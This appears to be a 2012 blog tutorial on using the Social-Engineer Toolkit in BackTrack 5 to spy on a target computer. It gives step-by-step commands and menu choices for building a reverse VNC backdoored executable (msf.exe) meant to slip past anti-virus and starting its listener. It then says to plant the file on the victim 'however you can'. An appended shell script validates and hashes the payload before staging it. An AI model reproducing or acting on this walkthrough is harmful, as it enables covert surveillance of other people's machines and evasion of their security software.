Wednesday, July 25, 2012

Spying on the target with SET in BackTrack 5



(Spying on a target machine with SET)

First, you need to change to the SET directory by typing the following:

cd /pentest/exploits/set  and hit enter.

then type: ./set  and hit enter.

Now you're in SET (the Social-Engineer Toolkit).

Next you will see the SET banner and menu, as shown in the picture. Keep in mind that yours may look a bit different, since the menus change between SET versions.


You will be presented with the options listed below.

Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About
   99) Return back to the main menu.

For this attack, choose number (1) and hit enter.


Then you will see the following:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules
  99) Return back to the main menu.

Choose number (4) and hit enter. You will first be asked for the IP address to use for the payload listener.
Note: to listen on the entire network, use // // as the IP. Keep in mind that with a reverse payload the IP you give here is the address the target will connect back to, so it must be an address the target can actually reach.

Next you will see the following:

What payload do you want to generate:

  Name:                                       Description:

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker
   4) Windows Bind Shell                      Execute payload and create an accepting port on remote system
   5) Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
   6) Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
   7) Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
   8) Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
   9) Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
  10) Windows Meterpreter Reverse DNS         Use a hostname instead of an IP address and spawn Meterpreter
  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET
  12) SE Toolkit HTTP Reverse Shell           Purely native HTTP shell with AES encryption support
  13) RATTE HTTP Tunneling Payload            Security bypass payload that will tunnel all comms over HTTP
  14) ShellCodeExec Alphanum Shellcode        This will drop a meterpreter payload through shellcodeexec (A/V Safe)
  15) Import your own executable              Specify a path for your own executable

Then choose number (3), Windows Reverse_TCP VNC DLL, and hit enter. This is the payload that spawns a VNC server on the target and connects it back to you, which is what lets you watch the target's screen.

Next, you will see:

Select one of the below, 'backdoored executable' is typically the best.

   1) avoid_utf8_tolower (Normal)
   2) shikata_ga_nai (Very Good)
   3) alpha_mixed (Normal)
   4) alpha_upper (Normal)
   5) call4_dword_xor (Normal)
   6) countdown (Normal)
   7) fnstenv_mov (Normal)
   8) jmp_call_additive (Normal)
   9) nonalpha (Normal)
  10) nonupper (Normal)
  11) unicode_mixed (Normal)
  12) unicode_upper (Normal)
  13) alpha2 (Normal)
  14) No Encoding (None)
  15) Multi-Encoder (Excellent)
  16) Backdoored Executable (BEST)

Choose number (16) and hit enter.

You will then be asked to set the PORT of the listener [443]. I chose 443, but see the note below: the anti-virus on the target machine decides what will and what will not be detected.
Note: find out what anti-virus the target has, or you may get caught by the target's anti-virus.

After choosing your port, hit enter. SET will now build the backdoored executable, which is meant to get past the anti-virus, and set up the matching listener for it.

Hit yes when prompted to start the listener.


Now open a new Konsole and change to the directory we started in by typing the following: cd /pentest/exploits/set, then hit enter.

Now type ls and hit enter.

You will now see what is inside. We are looking for the "msf.exe" file, and we want to copy it to the desktop, or wherever you want it, so we can put the file on the target machine.

To copy this file, type cp msf.exe ~/Desktop/msf.exe and hit enter. The file should now be on your desktop :)
Now exit that terminal.


To put the file on the target machine you will need to be creative. Remember, this is the Social-Engineer Toolkit, so get the file onto the machine however you can. For me, I'm testing this on my own laptop, so I just put it there.
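Before the msf.exe is carried off to the target, it is worth checking that the file SET wrote is actually a complete Windows executable (an interrupted or failed build can leave a stale or empty msf.exe in the SET directory) and recording its hash, so you can later tell exactly which build landed on the target and match it against the target's anti-virus logs. The script below is an added example, not part of the original post or of SET; the only things it assumes are the BackTrack 5 SET directory /pentest/exploits/set from the walkthrough and that the "Backdoored Executable" option produces a PE-format file. The sample file it builds at the end is constructed just to exercise the check.

```shell
#!/bin/sh
# Added example: a pre-flight check on the msf.exe that SET just wrote.
# Not part of the original post or of SET. Assumes the BackTrack 5 default
# SET directory and a PE-format payload.

SET_DIR=/pentest/exploits/set   # assumed default from the walkthrough

# is_pe FILE: succeed only if FILE looks like a Windows PE executable:
# "MZ" at offset 0 and "PE" at the offset stored in e_lfanew (bytes 60..63,
# little-endian). A stale, empty or truncated msf.exe fails this check.
is_pe() {
    f="$1"
    [ -f "$f" ] || return 1
    magic=$(dd if="$f" bs=1 count=2 2>/dev/null)
    [ "$magic" = "MZ" ] || return 1
    off=$(dd if="$f" bs=1 skip=60 count=4 2>/dev/null | od -An -tu4)
    off=$(echo $off)                        # strip od's padding
    [ -n "$off" ] || return 1
    sig=$(dd if="$f" bs=1 skip="$off" count=2 2>/dev/null)
    [ "$sig" = "PE" ]
}

# hash_file FILE: SHA-256 of FILE (sha256sum on Linux, shasum elsewhere).
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi
}

# stage_payload SRC DEST_DIR: refuse anything that is not a PE, then copy it
# and write its hash next to it so the exact build that reached the target
# is on record.
stage_payload() {
    src="$1"; dest="$2"
    is_pe "$src" || { echo "refusing to stage $src: not a PE executable" >&2; return 1; }
    mkdir -p "$dest" || return 1
    cp "$src" "$dest/" || return 1
    hash_file "$dest/$(basename "$src")" | tee "$dest/payload.sha256"
}

# mk_fake_pe FILE: write a minimal constructed PE header (MZ, e_lfanew=0x40,
# "PE\0\0") so the checks above can be exercised without a real payload.
mk_fake_pe() {
    {
        printf 'MZ'
        i=0; while [ "$i" -lt 58 ]; do printf '\000'; i=$((i+1)); done
        printf '\100\000\000\000'      # e_lfanew = 0x40, little-endian
        printf 'PE\000\000'
    } > "$1"
}

# Stand-alone demo on the constructed sample. With a real build you would run:
#   stage_payload "$SET_DIR/msf.exe" ~/Desktop/payload
demo_dir=$(mktemp -d)
mk_fake_pe "$demo_dir/msf.exe"
printf 'not a program' > "$demo_dir/notes.txt"
stage_payload "$demo_dir/msf.exe" "$demo_dir/staged"
stage_payload "$demo_dir/notes.txt" "$demo_dir/staged" || echo "rejected as expected"
rm -rf "$demo_dir"
```

Run it from a second Konsole after SET reports that the executable was written; the hash line it prints (and saves as payload.sha256 beside the copy) is what you compare against later if the target's anti-virus quarantines something.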


That's all. Any questions, just let me know.
